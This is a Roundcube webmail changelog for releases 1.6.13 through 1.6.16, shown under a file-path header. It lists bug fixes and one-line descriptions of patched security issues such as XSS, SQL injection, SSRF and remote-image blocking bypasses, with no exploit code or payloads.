Current File : //proc/10012/root/var/softaculous/roundcube/changelog.txt
## Release 1.6.16

- Fix potential too long value in IMAP ID command (#10136)
- Security: Fix stored XSS/HTML/CSS injection in subject field of the draft restore dialog
- Security: Fix CSS injection bypass in HTML sanitizer via SVG `<animate attributeName="style">`
- Security: Fix pre-auth SQL injection in `virtuser_query` plugin via preg_replace backslash escape bypass
- Security: Fix SSRF bypass via specific local address URLs
- Security: Fix bypass of remote image blocking via CSS var()
- Security: Fix local/private URL fetch bypass when remote resources were not allowed
- Security: Fix pre-auth arbitrary file delete via redis/memcache session poisoning bypass
- Security: Fix code injection vulnerability - remove support for code evaluation in LDAP `autovalues` option

## Release 1.6.15

- Fix regression where mail search would fail on non-ASCII search criteria (#10121)
- Fix regression where some data url images could get ignored/lost (#10128)
- Fix SVG Animate FUNCIRI Attribute Bypass — Remote Image Loading via fill/filter/stroke

## Release 1.6.14

- Fix Postgres connection using IPv6 address (#10104)
- Security: Fix pre-auth arbitrary file write via unsafe deserialization in redis/memcache session handler
- Security: Fix bug where a password could get changed without providing the old password
- Security: Fix IMAP Injection + CSRF bypass in mail search
- Security: Fix remote image blocking bypass via various SVG animate attributes
- Security: Fix remote image blocking bypass via a crafted body background attribute
- Security: Fix fixed position mitigation bypass via use of !important
- Security: Fix XSS issue in an HTML attachment preview
- Security: Fix SSRF + Information Disclosure via stylesheet links to local network hosts

## Release 1.6.13

- Managesieve: Fix handling of string-list format values for date tests in Out of Office (#10075)
- Fix remote image blocking bypass via SVG content reported by nullcathedral
- Fix CSS injection vulnerability reported by CERT Polska
